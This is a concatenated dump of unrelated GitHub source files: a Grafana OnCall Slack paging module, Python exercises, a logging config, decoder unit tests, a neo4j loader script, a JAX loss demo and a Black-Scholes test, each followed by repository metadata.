private_metadata,\n }\n\n return view\n\n\ndef _get_organization_select(organizations, value, input_id_prefix):\n organizations_options = []\n initial_option_idx = 0\n for idx, org in enumerate(organizations):\n if org == value:\n initial_option_idx = idx\n organizations_options.append(\n {\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": f\"{org.org_title}\",\n \"emoji\": True,\n },\n \"value\": f\"{org.pk}\",\n }\n )\n\n organization_select = {\n \"type\": \"input\",\n \"block_id\": input_id_prefix + DIRECT_PAGING_ORG_SELECT_ID,\n \"label\": {\n \"type\": \"plain_text\",\n \"text\": \"Organization\",\n },\n \"element\": {\n \"type\": \"static_select\",\n \"placeholder\": {\"type\": \"plain_text\", \"text\": \"Organization\", \"emoji\": True},\n \"options\": organizations_options,\n \"action_id\": OnPagingOrgChange.routing_uid(),\n \"initial_option\": organizations_options[initial_option_idx],\n },\n \"dispatch_action\": True,\n }\n\n return organization_select\n\n\ndef _get_select_field_value(payload, prefix_id, routing_uid, field_id):\n try:\n field = payload[\"view\"][\"state\"][\"values\"][prefix_id + field_id][routing_uid][\"selected_option\"]\n except KeyError:\n return None\n\n if field:\n return field[\"value\"]\n\n\ndef _get_selected_org_from_payload(payload, input_id_prefix, slack_team_identity, slack_user_identity):\n Organization = apps.get_model(\"user_management\", \"Organization\")\n selected_org_id = _get_select_field_value(\n payload, input_id_prefix, OnPagingOrgChange.routing_uid(), DIRECT_PAGING_ORG_SELECT_ID\n )\n if selected_org_id is None:\n return _get_available_organizations(slack_team_identity, slack_user_identity).first()\n else:\n org = Organization.objects.filter(pk=selected_org_id).first()\n return org\n\n\ndef _get_team_select_blocks(slack_user_identity, organization, is_selected, value, input_id_prefix):\n user = slack_user_identity.get_user(organization) # TODO: handle None\n teams = user.available_teams\n\n team_options = []\n # Adding pseudo option for default team\n initial_option_idx = 0\n team_options.append(\n {\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": f\"No team\",\n \"emoji\": True,\n },\n \"value\": DEFAULT_TEAM_VALUE,\n }\n )\n for idx, team in enumerate(teams, start=1):\n if team == value:\n initial_option_idx = idx\n team_options.append(\n {\n \"text\": {\n \"type\": 
\"plain_text\",\n \"text\": f\"{team.name}\",\n \"emoji\": True,\n },\n \"value\": f\"{team.pk}\",\n }\n )\n\n team_select = {\n \"type\": \"input\",\n \"block_id\": input_id_prefix + DIRECT_PAGING_TEAM_SELECT_ID,\n \"label\": {\n \"type\": \"plain_text\",\n \"text\": \"Team to notify\",\n },\n \"element\": {\n \"type\": \"static_select\",\n \"action_id\": OnPagingTeamChange.routing_uid(),\n \"placeholder\": {\"type\": \"plain_text\", \"text\": \"Select team\", \"emoji\": True},\n \"options\": team_options,\n },\n \"dispatch_action\": True,\n }\n\n # No context block if no team selected\n if not is_selected:\n return [team_select]\n\n team_select[\"element\"][\"initial_option\"] = team_options[initial_option_idx]\n return [team_select, _get_team_select_context(organization, value)]\n\n\ndef _get_team_select_context(organization, team):\n team_name = team.name if team else \"No team\"\n alert_receive_channel = AlertReceiveChannel.objects.filter(\n organization=organization,\n team=team,\n integration=AlertReceiveChannel.INTEGRATION_DIRECT_PAGING,\n ).first()\n\n escalation_chains_exist = EscalationChain.objects.filter(\n channel_filters__alert_receive_channel=alert_receive_channel\n ).exists()\n\n if not alert_receive_channel:\n context_text = (\n \":warning: *Direct paging integration missing*\\n\"\n \"The selected team doesn't have a direct paging integration configured and will not be notified. \"\n \"If you proceed with the alert group, an empty direct paging integration will be created automatically for the team. \"\n \"\"\n )\n elif not escalation_chains_exist:\n context_text = (\n \":warning: *Direct paging integration not configured*\\n\"\n \"The direct paging integration for the selected team has no escalation chains configured. \"\n \"If you proceed with the alert group, the team likely will not be notified. 
\"\n \"\"\n )\n else:\n context_text = f\"Integration <{alert_receive_channel.web_link}|{alert_receive_channel.verbal_name} ({team_name})> will be used for notification.\"\n\n context = {\n \"type\": \"context\",\n \"elements\": [\n {\n \"type\": \"mrkdwn\",\n \"text\": context_text,\n }\n ],\n }\n return context\n\n\ndef _get_additional_responders_blocks(\n payload, organization, input_id_prefix, is_additional_responders_checked, error_msg\n):\n checkbox_option = {\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": \"Notify additional responders\",\n },\n }\n\n blocks = [\n {\n \"type\": \"input\",\n \"block_id\": input_id_prefix + DIRECT_PAGING_ADDITIONAL_RESPONDERS_INPUT_ID,\n \"label\": {\n \"type\": \"plain_text\",\n \"text\": \"Additional responders\",\n },\n \"element\": {\n \"type\": \"checkboxes\",\n \"options\": [checkbox_option],\n \"action_id\": OnPagingCheckAdditionalResponders.routing_uid(),\n },\n \"optional\": True,\n \"dispatch_action\": True,\n }\n ]\n\n if is_additional_responders_checked:\n blocks[0][\"element\"][\"initial_options\"] = [checkbox_option]\n\n if error_msg:\n blocks += [\n {\n \"type\": \"section\",\n \"block_id\": \"error_message\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f\":warning: {error_msg}\",\n },\n }\n ]\n\n if is_additional_responders_checked:\n users_select = _get_users_select(organization, input_id_prefix)\n schedules_select = _get_schedules_select(organization, input_id_prefix)\n\n blocks += [users_select, schedules_select]\n # selected items\n selected_users = get_current_items(payload, USERS_DATA_KEY, organization.users)\n selected_schedules = get_current_items(payload, SCHEDULES_DATA_KEY, organization.oncall_schedules)\n\n if selected_users or selected_schedules:\n blocks += [DIVIDER_BLOCK]\n blocks += _get_selected_entries_list(input_id_prefix, USERS_DATA_KEY, selected_users)\n blocks += _get_selected_entries_list(input_id_prefix, SCHEDULES_DATA_KEY, selected_schedules)\n blocks += [DIVIDER_BLOCK]\n\n return blocks\n\n\ndef _get_users_select(organization, input_id_prefix):\n users = organization.users.all()\n\n user_options = [\n {\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": f\"{user.name or user.username}\",\n \"emoji\": True,\n },\n \"value\": f\"{user.pk}\",\n }\n for user in users\n ]\n\n if not user_options:\n return {\"type\": \"context\", \"elements\": [{\"type\": \"mrkdwn\", \"text\": \"No users available\"}]}\n\n user_select = {\n \"type\": \"section\",\n \"text\": {\"type\": \"mrkdwn\", \"text\": \"Add users\"},\n \"block_id\": input_id_prefix + DIRECT_PAGING_USER_SELECT_ID,\n \"accessory\": {\n \"type\": \"static_select\",\n \"placeholder\": {\"type\": \"plain_text\", \"text\": \"Select a user\", \"emoji\": True},\n \"action_id\": OnPagingUserChange.routing_uid(),\n },\n }\n MAX_STATIC_SELECT_OPTIONS = 100\n if len(user_options) > MAX_STATIC_SELECT_OPTIONS:\n # paginate user options in groups\n max_length = MAX_STATIC_SELECT_OPTIONS\n chunks = [user_options[x : x + max_length] for x in range(0, len(user_options), max_length)]\n option_groups = [\n {\n \"label\": {\"type\": \"plain_text\", \"text\": f\"({(i * max_length)+1}-{(i * max_length)+max_length})\"},\n \"options\": group,\n }\n for i, group in enumerate(chunks)\n ]\n user_select[\"accessory\"][\"option_groups\"] = option_groups\n\n else:\n user_select[\"accessory\"][\"options\"] = user_options\n\n return user_select\n\n\ndef _get_schedules_select(organization, input_id_prefix):\n schedules = organization.oncall_schedules.all()\n\n schedule_options = 
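_get_users_select above works around Slack's 100-option limit on static selects by slicing the options into option_groups labelled with their index ranges. The slicing itself, isolated with dummy options:

MAX_STATIC_SELECT_OPTIONS = 100

user_options = [{"value": str(i)} for i in range(250)]  # dummy options

chunks = [
    user_options[x : x + MAX_STATIC_SELECT_OPTIONS]
    for x in range(0, len(user_options), MAX_STATIC_SELECT_OPTIONS)
]
option_groups = [
    {
        "label": {
            "type": "plain_text",
            "text": f"({i * MAX_STATIC_SELECT_OPTIONS + 1}-{i * MAX_STATIC_SELECT_OPTIONS + MAX_STATIC_SELECT_OPTIONS})",
        },
        "options": group,
    }
    for i, group in enumerate(chunks)
]
print(len(option_groups), [len(g["options"]) for g in option_groups])  # 3 [100, 100, 50]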
[\n {\n \"text\": {\n \"type\": \"plain_text\",\n \"text\": f\"{schedule.name}\",\n \"emoji\": True,\n },\n \"value\": f\"{schedule.pk}\",\n }\n for schedule in schedules\n ]\n if not schedule_options:\n schedule_select = {\"type\": \"context\", \"elements\": [{\"type\": \"mrkdwn\", \"text\": \"No schedules available\"}]}\n else:\n schedule_select = {\n \"type\": \"section\",\n \"text\": {\"type\": \"mrkdwn\", \"text\": \"Add schedules\"},\n \"block_id\": input_id_prefix + DIRECT_PAGING_SCHEDULE_SELECT_ID,\n \"accessory\": {\n \"type\": \"static_select\",\n \"placeholder\": {\"type\": \"plain_text\", \"text\": \"Select a schedule\", \"emoji\": True},\n \"options\": schedule_options,\n \"action_id\": OnPagingScheduleChange.routing_uid(),\n },\n }\n return schedule_select\n\n\ndef _get_selected_entries_list(input_id_prefix, key, entries):\n current_entries = []\n for entry, policy in entries:\n if key == USERS_DATA_KEY:\n icon = \":bust_in_silhouette:\"\n name = entry.name or entry.username\n extra = entry.timezone\n else:\n # schedule\n icon = \":spiral_calendar_pad:\"\n name = entry.name\n extra = None\n current_entries.append(\n {\n \"type\": \"section\",\n \"block_id\": input_id_prefix + f\"{key}_{entry.pk}\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": f\"{icon} *{name}* | {policy} notifications\" + (f\"\\n_({extra})_\" if extra else \"\"),\n },\n \"accessory\": {\n \"type\": \"overflow\",\n \"options\": [\n {\"text\": {\"type\": \"plain_text\", \"text\": f\"{label}\"}, \"value\": f\"{action}|{key}|{entry.pk}\"}\n for (action, label) in ITEM_ACTIONS\n ],\n \"action_id\": OnPagingItemActionChange.routing_uid(),\n },\n }\n )\n return current_entries\n\n\ndef _display_availability_warnings(payload, warnings, organization, user):\n metadata = json.loads(payload[\"view\"][\"private_metadata\"])\n\n messages = []\n for w in warnings:\n if w[\"error\"] == USER_IS_NOT_ON_CALL:\n messages.append(\n f\":warning: User *{user.name or user.username}* is not on-call.\\nWe recommend you to select on-call users first.\"\n )\n schedules_available = w[\"data\"].get(\"schedules\", {})\n if schedules_available:\n messages.append(\":information_source: Currently on-call from schedules:\")\n for schedule, users in schedules_available.items():\n oncall_users = organization.users.filter(public_primary_key__in=users)\n usernames = \", \".join(f\"*{u.name or u.username}*\" for u in oncall_users)\n messages.append(f\":spiral_calendar_pad: {schedule}: {usernames}\")\n elif w[\"error\"] == USER_HAS_NO_NOTIFICATION_POLICY:\n messages.append(f\":warning: User *{user.name or user.username}* has no notification policy setup.\")\n\n return {\n \"type\": \"modal\",\n \"callback_id\": OnPagingConfirmUserChange.routing_uid(),\n \"title\": {\"type\": \"plain_text\", \"text\": \"Are you sure?\"},\n \"submit\": {\"type\": \"plain_text\", \"text\": \"Confirm\"},\n \"blocks\": [\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": message,\n },\n }\n for message in messages\n ],\n \"private_metadata\": json.dumps(\n {\n \"state\": payload[\"view\"][\"state\"],\n \"input_id_prefix\": metadata[\"input_id_prefix\"],\n \"channel_id\": metadata[\"channel_id\"],\n \"submit_routing_uid\": metadata[\"submit_routing_uid\"],\n USERS_DATA_KEY: metadata[USERS_DATA_KEY],\n SCHEDULES_DATA_KEY: metadata[SCHEDULES_DATA_KEY],\n }\n ),\n }\n\n\ndef _get_selected_team_from_payload(payload, input_id_prefix):\n Team = apps.get_model(\"user_management\", \"Team\")\n selected_team_id = _get_select_field_value(\n 
payload, input_id_prefix, OnPagingTeamChange.routing_uid(), DIRECT_PAGING_TEAM_SELECT_ID\n )\n\n if selected_team_id is None:\n return None, None\n\n if selected_team_id == DEFAULT_TEAM_VALUE:\n return selected_team_id, None\n\n team = Team.objects.filter(pk=selected_team_id).first()\n return selected_team_id, team\n\n\ndef _get_additional_responders_checked_from_payload(payload, input_id_prefix):\n try:\n selected_options = payload[\"view\"][\"state\"][\"values\"][\n input_id_prefix + DIRECT_PAGING_ADDITIONAL_RESPONDERS_INPUT_ID\n ][OnPagingCheckAdditionalResponders.routing_uid()][\"selected_options\"]\n except KeyError:\n return False\n\n return len(selected_options) > 0\n\n\ndef _get_selected_user_from_payload(payload, input_id_prefix):\n User = apps.get_model(\"user_management\", \"User\")\n selected_user_id = _get_select_field_value(\n payload, input_id_prefix, OnPagingUserChange.routing_uid(), DIRECT_PAGING_USER_SELECT_ID\n )\n if selected_user_id is not None:\n user = User.objects.filter(pk=selected_user_id).first()\n return user\n\n\ndef _get_selected_schedule_from_payload(payload, input_id_prefix):\n OnCallSchedule = apps.get_model(\"schedules\", \"OnCallSchedule\")\n selected_schedule_id = _get_select_field_value(\n payload, input_id_prefix, OnPagingScheduleChange.routing_uid(), DIRECT_PAGING_SCHEDULE_SELECT_ID\n )\n if selected_schedule_id is not None:\n schedule = OnCallSchedule.objects.filter(pk=selected_schedule_id).first()\n return schedule\n\n\ndef _get_and_change_input_id_prefix_from_metadata(metadata):\n old_input_id_prefix = metadata[\"input_id_prefix\"]\n new_input_id_prefix = _generate_input_id_prefix()\n metadata[\"input_id_prefix\"] = new_input_id_prefix\n return old_input_id_prefix, new_input_id_prefix, metadata\n\n\ndef _get_title_input(payload):\n title_input_block = {\n \"type\": \"input\",\n \"block_id\": DIRECT_PAGING_TITLE_INPUT_ID,\n \"label\": {\n \"type\": \"plain_text\",\n \"text\": \"Title\",\n },\n \"element\": {\n \"type\": \"plain_text_input\",\n \"action_id\": FinishDirectPaging.routing_uid(),\n \"placeholder\": {\n \"type\": \"plain_text\",\n \"text\": \" \",\n },\n },\n }\n if payload.get(\"text\", None) is not None:\n title_input_block[\"element\"][\"initial_value\"] = payload[\"text\"]\n return title_input_block\n\n\ndef _get_title_from_payload(payload):\n title = payload[\"view\"][\"state\"][\"values\"][DIRECT_PAGING_TITLE_INPUT_ID][FinishDirectPaging.routing_uid()][\"value\"]\n return title\n\n\ndef _get_message_input(payload):\n message_input_block = {\n \"type\": \"input\",\n \"block_id\": DIRECT_PAGING_MESSAGE_INPUT_ID,\n \"label\": {\n \"type\": \"plain_text\",\n \"text\": \"Message\",\n },\n \"element\": {\n \"type\": \"plain_text_input\",\n \"action_id\": FinishDirectPaging.routing_uid(),\n \"multiline\": True,\n \"placeholder\": {\n \"type\": \"plain_text\",\n \"text\": \" \",\n },\n },\n \"optional\": True,\n }\n if payload.get(\"message\", {}).get(\"text\") is not None:\n message_input_block[\"element\"][\"initial_value\"] = payload[\"message\"][\"text\"]\n return message_input_block\n\n\ndef _get_message_from_payload(payload):\n message = (\n payload[\"view\"][\"state\"][\"values\"][DIRECT_PAGING_MESSAGE_INPUT_ID][FinishDirectPaging.routing_uid()][\"value\"]\n or \"\"\n )\n return message\n\n\ndef _get_available_organizations(slack_team_identity, slack_user_identity):\n return (\n slack_team_identity.organizations.filter(users__slack_user_identity=slack_user_identity)\n .order_by(\"pk\")\n .distinct()\n )\n\n\n# 
_generate_input_id_prefix returns uniq str to not to preserve input's values between view update\n# https://api.slack.com/methods/views.update#markdown\ndef _generate_input_id_prefix():\n return str(uuid4())\n\n\nSTEPS_ROUTING = [\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_BLOCK_ACTIONS,\n \"block_action_type\": scenario_step.BLOCK_ACTION_TYPE_STATIC_SELECT,\n \"block_action_id\": OnPagingOrgChange.routing_uid(),\n \"step\": OnPagingOrgChange,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_BLOCK_ACTIONS,\n \"block_action_type\": scenario_step.BLOCK_ACTION_TYPE_STATIC_SELECT,\n \"block_action_id\": OnPagingTeamChange.routing_uid(),\n \"step\": OnPagingTeamChange,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_BLOCK_ACTIONS,\n \"block_action_type\": scenario_step.BLOCK_ACTION_TYPE_CHECKBOXES,\n \"block_action_id\": OnPagingCheckAdditionalResponders.routing_uid(),\n \"step\": OnPagingCheckAdditionalResponders,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_BLOCK_ACTIONS,\n \"block_action_type\": scenario_step.BLOCK_ACTION_TYPE_STATIC_SELECT,\n \"block_action_id\": OnPagingUserChange.routing_uid(),\n \"step\": OnPagingUserChange,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_VIEW_SUBMISSION,\n \"view_callback_id\": OnPagingConfirmUserChange.routing_uid(),\n \"step\": OnPagingConfirmUserChange,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_BLOCK_ACTIONS,\n \"block_action_type\": scenario_step.BLOCK_ACTION_TYPE_STATIC_SELECT,\n \"block_action_id\": OnPagingScheduleChange.routing_uid(),\n \"step\": OnPagingScheduleChange,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_BLOCK_ACTIONS,\n \"block_action_type\": scenario_step.BLOCK_ACTION_TYPE_OVERFLOW,\n \"block_action_id\": OnPagingItemActionChange.routing_uid(),\n \"step\": OnPagingItemActionChange,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_SLASH_COMMAND,\n \"command_name\": StartDirectPaging.command_name,\n \"step\": StartDirectPaging,\n },\n {\n \"payload_type\": scenario_step.PAYLOAD_TYPE_VIEW_SUBMISSION,\n \"view_callback_id\": FinishDirectPaging.routing_uid(),\n \"step\": FinishDirectPaging,\n },\n]\n","repo_name":"shantanualsi/oncall","sub_path":"engine/apps/slack/scenarios/paging.py","file_name":"paging.py","file_ext":"py","file_size_in_byte":35564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"11805818507","text":"unconfirmed_users = ['alice', 'brian', 'candace']\nconfirmed_users = []\n\nwhile unconfirmed_users:\n current_users = unconfirmed_users.pop()\n\n print(f\"Verifying user: {current_users.title()}\")\n confirmed_users.append(current_users)\n\nprint(\"\\nThe following users have been confirmed:\")\nfor confirmed_user in confirmed_users:\n print(confirmed_user.title())\n\n#pets.py \npets = ['dog', 'cat', 'dog', 'goldfish', 'cat', 'rabbit', 'cat']\nprint(pets)\n\nwhile 'cat' in pets:\n pets.remove('cat')\n\nprint(pets)\n\n#mountain_poll.py\n\nresponses = {}\n\npolling_activate = True\n\nwhile polling_activate:\n name = input(\"\\nWhat is your name?\")\n response = input(\"Which mountain would you like to climb someday?\")\n\n responses[name] = response\n\n repeat = input(\"Would you like to let another person respond?(yes/no)\")\n if repeat == 'no':\n polling_activate = False\n\nprint(\"\\n---Poll Results---\")\nfor name, response in responses.items():\n print(f\"{name} would like to climb 
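A side note on the pets.py snippet here: the while 'cat' in pets: pets.remove('cat') idiom rescans the list from the start on every pass, which is quadratic in the worst case. For larger lists a single comprehension pass removes all occurrences in linear time:

# One linear pass instead of repeated remove() scans.
pets = ['dog', 'cat', 'dog', 'goldfish', 'cat', 'rabbit', 'cat']
pets = [pet for pet in pets if pet != 'cat']
print(pets)  # ['dog', 'dog', 'goldfish', 'rabbit']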
{response}.\")\n","repo_name":"jermartinz/Practice","sub_path":"Python-Crash-Course-Book/Ch7/confirmed_users.py","file_name":"confirmed_users.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16491381559","text":"#Logging implementation\n# this is the custom login\n\n#installing operating system and logging\nimport os\nimport sys\nimport logging\n\nlogging_str = \"[%(asctime)s: %(levelname)s: %(module)s: %(message)s]\" #initialize logging stream by saving ASCII timestamp and then save log level (info level log or bug log) then module , which module is running and then message we want to print\n\nlog_dir = \"logs\" # first a log directory is created\nlog_filepath = os.path.join(log_dir,\"running_logs.log\") # inside that running log directory is created\nos.makedirs(log_dir, exist_ok=True)\n\n\nlogging.basicConfig(\n level= logging.INFO,\n format= logging_str,\n\n handlers=[\n logging.FileHandler(log_filepath), # File handler will create teh log folder and save all the logging information\n logging.StreamHandler(sys.stdout) # Stream handler will print the log in the terminal\n ]\n)\n\nlogger = logging.getLogger(\"mlProjectLogger\") # finally initialize logger here\n","repo_name":"Pan2707/End-to-end-ML-project-with-ML-flow","sub_path":"src/mlProject/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8179886813","text":"import pytest\nimport math\nimport tensorflow as tf\nimport numpy as np\nfrom numpy.testing import assert_almost_equal\n\nfrom gtd.utils import Bunch\nfrom strongsup.example import Context\nfrom strongsup.decoder import Decoder, DecoderConfig\nfrom strongsup.predicate import Predicate\nfrom strongsup.utils import EOS\nfrom strongsup.tests.utils import PredicateGenerator, softmax\n\n\nclass DummyParseModel(object):\n def __init__(self, logits):\n self.logits = logits\n\n def score(self, cases):\n for case in cases:\n case.choice_logits = self.logits[:len(case.choices)]\n case.choice_probs = softmax(self.logits[:len(case.choices)])\n\n\nclass DummyExecutor(object):\n\n def execute(self, y_toks, old_denotation=None):\n new_denotation = (old_denotation or []) + [x.name for x in y_toks]\n # Let's disallow some sequences\n if new_denotation == ['a', 'c']:\n raise ValueError\n return new_denotation\n\n\nclass DummyContext(Context):\n def __init__(self):\n self._table_path = None\n self._utterance = None\n self._executor = DummyExecutor()\n self._predicates = None\n\n @property\n def predicates(self):\n return self._predicates\n\n\nclass TestSimpleDecode(object):\n @pytest.fixture\n def context(self):\n context = DummyContext()\n p = PredicateGenerator(context)\n context._predicates = [p('a'), p('b'), p('c'), p(EOS)]\n return context\n\n @pytest.fixture\n def parse_model(self):\n return DummyParseModel([0, math.log(2), math.log(4), math.log(3)])\n\n @pytest.fixture\n def config(self):\n return DecoderConfig(10, 3)\n\n @pytest.fixture\n def decoder(self, parse_model, config):\n caching = False\n return Decoder(parse_model, None, None, caching, config)\n\n def test_initial_beam(self, decoder, context):\n beam = decoder.initial_beam(context)\n assert len(beam) == 1\n assert len(beam[0]) == 0\n assert beam[0].context == context\n\n def test_advance(self, decoder, context):\n beam = decoder.initial_beam(context)\n new_beams = 
decoder.advance([beam])\n assert len(new_beams) == 1\n new_beam = new_beams[0]\n assert len(new_beam) == 4\n ranked = [' '.join([y.name for y in x.decisions]) for x in new_beam]\n assert ranked == ['c', EOS, 'b', 'a']\n\n def test_advance_twice(self, config, context):\n logits = [math.log(1), math.log(2), math.log(4), math.log(3)]\n parse_model = DummyParseModel(logits)\n caching = False\n decoder = Decoder(parse_model, None, None, caching, config)\n beam = decoder.initial_beam(context)\n new_beams = decoder.advance([beam])\n parse_model.logits = [math.log(5), math.log(2), math.log(7), math.log(6)]\n new_beams = decoder.advance(new_beams)\n assert len(new_beams) == 1\n new_beam = new_beams[0]\n assert len(new_beam) == 10\n ranked = [' '.join([y.name for y in x.decisions]) for x in new_beam]\n assert ranked == [\n EOS, 'c c', 'c ' + EOS, 'c a', 'b c',\n 'b ' + EOS, 'b a', 'c b', 'a ' + EOS, 'a a']\n\n def test_normalized_path_probs(self):\n beam = [Bunch(prob=0.01), Bunch(prob=0.5), Bunch(prob=0.2)]\n assert_almost_equal(Decoder._normalized_path_probs(beam), [1./71, 50./71, 20./71], decimal=5)\n\n # TODO Test predictions and train_step\n","repo_name":"microsoft/ContextualSP","sub_path":"lemon/executor/strongsup/tests/test_decoder.py","file_name":"test_decoder.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"21"} +{"seq_id":"21303173035","text":"##CARTELLA==operazioni_stringhe\ndef word_count(str):\n counts = dict()\n words = str.split()\n\n for word in words:\n if word in counts:\n counts[word] += 1\n else:\n counts[word] = 1\n\n return counts\n\nprint( word_count('the quick brown fox jumps over the lazy dog.'))\ndef word_count1(str):\n\tcounts =0\n\twords = str.split()\n\twords1= set(words)\n\tfor w1 in words1:\n\t\tcounts=0\n\t\tfor w in words:\n\t\t\tif w1==w:\n\t\t\t\tcounts=counts+1\n\t\t\t\t# ~ c1=str(counts)\n # ~ if word in counts:\n # ~ counts[word] += 1\n # ~ else:\n\t\tprint(w1,\" \",counts) # ~ counts[wored] = 1\n\t\t# ~ print(counts)\n\t\t# ~ return w + c1\nprint( word_count1('brown brown the quick brown fox jumps over the lazy dog.'))\n","repo_name":"paolocassina2/file_python2","sub_path":"file_python/operazioni_stringhe/countwords_2_methods.py","file_name":"countwords_2_methods.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41718207114","text":"n, l, d = map(int, input().split())\n\nmusic = [True] * ((n * l) + (5 * (n - 1)))\n\nfor i in range(n):\n play_time = (l + 5) * i\n for j in range(play_time, play_time + l):\n music[j] = False\nanswer = 0\nwhile answer < len(music):\n if music[answer]:\n break\n answer += d\nprint(answer)","repo_name":"hanmingi/Prepare-CodingTest","sub_path":"Baekjoon/Python/1333.py","file_name":"1333.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32008302324","text":"from py2neo import *\r\ngraph = Graph(\"http://localhost:7474\", username=\"neo4j\", password='Chen0225')\r\n\r\nfile1=open(\"yi.txt\", 'r')\r\ns1=file1.read()\r\nfor x in s1:\r\n sss = \"MATCH (a:Char) where a.name='\"+x+\"' set a.sheng = 1\"\r\n graph.run(sss)\r\n\r\nfile2=open(\"er.txt\", 'r')\r\ns2=file2.read()\r\nfor x in s2:\r\n sss = \"MATCH (a:Char) where a.name='\"+x+\"' set a.sheng = 2\"\r\n graph.run(sss)\r\n\r\nfile3=open(\"san.txt\", 'r')\r\ns3=file3.read()\r\nfor x in 
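Both word_count variants in the countwords snippet above, the dict accumulation and the set-plus-recount loop, re-implement a multiset by hand. The standard library's collections.Counter produces the same tallies in one line:

from collections import Counter

counts = Counter('the quick brown fox jumps over the lazy dog.'.split())
print(counts['the'])  # 2
print(counts)         # full word -> count mapping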
s3:\r\n sss = \"MATCH (a:Char) where a.name='\"+x+\"' set a.sheng = 3\"\r\n graph.run(sss)\r\n\r\nfile4=open(\"si.txt\", 'r')\r\ns4=file4.read()\r\nfor x in s4:\r\n sss = \"MATCH (a:Char) where a.name='\"+x+\"' set a.sheng = 4\"\r\n graph.run(sss)\r\n","repo_name":"xchennnw/LiShangyin-Poem-Writer","sub_path":"XieShi2019/setsheng.py","file_name":"setsheng.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2428403360","text":"import jax\nfrom jax import random, numpy as jnp\nfrom flax import linen as nn\nfrom trainer.loss.custom import multiple_negatives_ranking_loss\nfrom jax.config import config\n\n# Dummy version\nbatch_size = 20\nembedding_size = 250\n\n\ndef demo_train_step(model, params, input):\n # We can integrate with existing scripts. this is for demo purpose.\n\n def loss(params):\n preds = model.apply(params, input)\n preds = jnp.reshape(preds, (preds.shape[0], -1, embedding_size))\n return multiple_negatives_ranking_loss(preds)\n\n loss, grad = jax.value_and_grad(loss)(params)\n return loss, grad\n\n\ndef main():\n key = random.PRNGKey(0)\n key1, key2 = random.split(key)\n\n dummy_model = nn.Dense(features=3 * embedding_size)\n dummy_input = random.normal(key1, (batch_size, 200))\n params = dummy_model.init(key2, dummy_input)\n\n value, grad = demo_train_step(dummy_model, params, dummy_input)\n print(\"Value : \", value)\n print(\"Grad : \", grad)\n\n\nif __name__ == \"__main__\":\n config.update(\"jax_enable_x64\", True)\n main()\n","repo_name":"nreimers/flax-sentence-embeddings","sub_path":"trainer/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"21"} +{"seq_id":"39659200322","text":"'''\n\nbs_analytical_test.py\n\n28 April 2019\nJeffrey J. 
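The JAX demo above reshapes each prediction row into groups of three embedding_size vectors before handing them to multiple_negatives_ranking_loss, whose definition lives in trainer.loss.custom and is not shown here. A common formulation of that loss, softmax cross-entropy over anchor-candidate similarities with in-batch negatives, as a hedged sketch (the real implementation may differ in similarity measure and scaling):

import jax.numpy as jnp
from jax.nn import log_softmax

def mnr_loss(embeddings, scale=20.0):
    # embeddings: (batch, 3, dim) rows of (anchor, positive, hard negative);
    # every other row's positive and negative act as in-batch negatives.
    anchors, positives, negatives = embeddings[:, 0], embeddings[:, 1], embeddings[:, 2]
    candidates = jnp.concatenate([positives, negatives], axis=0)   # (2*batch, dim)
    norm = lambda m: m / jnp.linalg.norm(m, axis=1, keepdims=True)
    scores = scale * norm(anchors) @ norm(candidates).T            # cosine scores
    log_probs = log_softmax(scores, axis=1)
    batch = embeddings.shape[0]
    # The true pair for row i sits at column i of the score matrix.
    return -jnp.mean(log_probs[jnp.arange(batch), jnp.arange(batch)])

emb = jnp.reshape(jnp.arange(24.0) / 24.0, (2, 3, 4))
print(mnr_loss(emb))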
Walker\n\nA simple test of the bs_analytical_solver.py function\n\n'''\n\nimport numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\nfrom bs_analytical_solver import bs_analytical_solver\n\nstrike=294.0\nSt=293.41\nrfr=(2.36)/100\ntexp=4/365.0\nsig=(6.3361/100)\notype='p'\n\nsolution,delta,gamma,vega,theta,rho = bs_analytical_solver(\n\tS=St,K=strike,r=rfr,T=texp,sigma=sig,o_type=otype)\n\nprint('Price:'+str(solution))\nprint('Delta:'+str(delta))\nprint('Gamma:'+str(gamma))\nprint('Vega:'+str(vega))\nprint('Theta:'+str(theta))\nprint('Rho:'+str(rho))\n\n","repo_name":"jjwalkerwvu/finance","sub_path":"bs_analytical_test.py","file_name":"bs_analytical_test.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2055854413","text":"# Calcule la moyenne de la classe\nimport numpy as np\n\ngrades = np.array([[10, 12.5, 6], [19, 18.5, 16], [14, 13.5, 17]])\n\ngrades_len = 